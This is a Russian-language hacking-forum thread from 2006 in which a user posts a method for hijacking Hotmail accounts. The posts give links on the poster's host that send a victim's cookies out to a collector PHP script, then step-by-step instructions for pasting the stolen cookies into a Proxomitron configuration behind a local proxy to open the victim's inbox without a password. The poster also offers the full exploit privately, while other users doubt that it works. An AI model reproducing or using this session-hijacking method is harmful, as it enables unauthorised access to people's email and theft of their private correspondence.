ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взлом ХотМайла
  #1  
Старый 25.09.2006, 21:49
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию Взлом ХотМайла

Взлом ХотМайла
линк сниффера:
http://devarsiv.org/picture5.jpg
http://devarsiv.org/a.gif
http://www.devarsiv.org/a.txt
при нажатии на линк у жертвы уплывут куки на аддресс:
www.devarsiv.org/alex/alex.php

Подмена куки и вход в инбокс обходя пасс: через Mozila Firefox в настройках браузера:tools,option,connection setting,manual proxy configuration HTTP proxy вводим 127.0.0.1 port 8080 ставим у себя галочку на: use this proxy server for all protocols

идиом дальше: качаем http://www.devarsiv.org/proxomitron.zip
открываем подручным текстовым редактором в проксеметроне файл default.cfg находим строку:
In = TRUE
Out = TRUE
Key = "cookie:hott"
Match = "*"
Replace = ""
и меж кавычек в Replace = "" вставляем наши куки
теперь в браузере Mozila Firefox вводим этот аддрecc:http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и попадаем в инбокс обходя пасс
просьба не злоупотреблять приведённым примером
всем удачного xака !!

Последний раз редактировалось Actu@l SpY; 26.09.2006 в 10:25..
 
Ответить с цитированием

  #2  
Старый 26.09.2006, 00:20
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315

Репутация: 1228


Отправить сообщение для nc.STRIEM с помощью ICQ
По умолчанию

Чесно говоря ниче не понял!
При нажатие на какой линк у жертвы уплывают куки???
про XSS здесь ниче не написано!
Можно чуть по поподробней про сам угон куков!

Последний раз редактировалось nc.STRIEM; 26.09.2006 в 00:22..
 
Ответить с цитированием

  #3  
Старый 26.09.2006, 00:34
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

Что то уж очень похоже на развод. Лень проверять - докажи что нет - уберу минус, воткну плюс
 
Ответить с цитированием

  #4  
Старый 26.09.2006, 02:33
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию

нажав на линк одной из этих ссылок:
http://devarsiv.org/picture5.jpg
http://devarsiv.org/a.gif
http://www.devarsiv.org/a.txt
__________________________________________________ ___

куки уплывут на адрес: www.devarsiv.org/alex/alex.php
подменяете куки в проксометроне.
a в браузере Mozila Firefox пройдя по этой ссылке:
http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
и вы в инбоксе

Последний раз редактировалось Actu@l SpY; 26.09.2006 в 09:39..
 
Ответить с цитированием

  #5  
Старый 26.09.2006, 02:48
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию

Цитата:
Сообщение от LoFFi  
Что то уж очень похоже на развод. Лень проверять - докажи что нет - уберу минус, воткну плюс
100% рабочая бага
раньше срабатывала и на яхо, но на яхо багу недавно закрыли

Последний раз редактировалось Actu@l SpY; 26.09.2006 в 03:52..
 
Ответить с цитированием

  #6  
Старый 26.09.2006, 04:11
[hidden]
Участник форума
Регистрация: 05.11.2005
Сообщений: 103
Провел на форуме:
425441

Репутация: 31
По умолчанию

Автор, не скажу что это лажа, но с той статьи, откуда ты это взял, мог и полные пути выдрать. Попробуй зайди на http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes

Далее, где тут XSS, которая кукисы сдирает? Ты привел адреса снифферов, но их надо как-то применить
 
Ответить с цитированием

  #7  
Старый 26.09.2006, 07:00
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию

статья моя сам написал, не откуда не выдёргивал.
объясню ещё раз, бага рабочая работает без проблем.
эту ссылку: http://www.devarsiv.org/a.txt скиньте на хотмайл
после нажатия на ссылку жертва попадет к себе-же в календарь
сработает скрипт и куки уплывут на адрес: www.devarsiv.org/alex/alex.php
далее: открываем текстовым редактором в проксометроне файл "default.cfg" находим строку
In = TRUE
Out = TRUE
Key = "cookie:hott"
Match = "*"
Replace = ""
и меж кавычек в Replace = " here" вставляем куки
попaдём мы в инбокс только через Mozila Firefox
изменим в настройках браузера:configuration HTTP proxy: на 127.0.0.1 порт 8080
после запустим сам проскометрон он должен будет ждать соединения на 8080 порту
в браузере Мозила где вы изменили configuration HTTP proxy на 127.0.0.1 8080 вводим: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и вы попaдаете в инбокс от куда угнали куки
если не разберётесь стучите в асиу
удачи!!

Последний раз редактировалось Actu@l SpY; 26.09.2006 в 09:39..
 
Ответить с цитированием

  #8  
Старый 26.09.2006, 07:22
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию

Цитата:
Сообщение от [hidden]  
Автор, не скажу что это лажа, но с той статьи, откуда ты это взял, мог и полные пути выдрать. Попробуй зайди на http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes

Далее, где тут XSS, которая кукисы сдирает? Ты привел адреса снифферов, но их надо как-то применить
сам сплойт у меня на хосте выполнит скрипт, вам нужно,
чтоб жертва просто прошла по одной любой из этих ссылок:
http://devarsiv.org/a.gif
http://devarsiv.org/picture5.jpg
http://www.devarsiv.org/a.txt
а на этот адрес: www.devarsiv.org/alex/alex.php придут куки

Последний раз редактировалось Actu@l SpY; 29.09.2006 в 03:27..
 
Ответить с цитированием

  #9  
Старый 26.09.2006, 07:39
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию

кто хочет ломануть мыло в домен-не хотмаил может воспользоваться уже готовым приведённым выше мной вариантом
сам сплойт и ксс на хотмайле выкладывать в паблик не буду,кто реально нуждается стучите могу скинуть все нужные файлы, для этого вам понадобится хост с поддержкой Php
 
Ответить с цитированием

  #10  
Старый 26.09.2006, 09:19
Mukis
Участник форума
Регистрация: 27.11.2005
Сообщений: 211
Провел на форуме:
619677

Репутация: 34
По умолчанию

Короч я понял. Фишка в следующем. Верхний вариант -- это если ты уже в корень обленился, не собрать сплоит, не залить его и т.д. Нижний вариант, я имею ввиду предложение кому надо сплоит и т.п. -- это если ты не веришь, что это должно работать)))))))
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ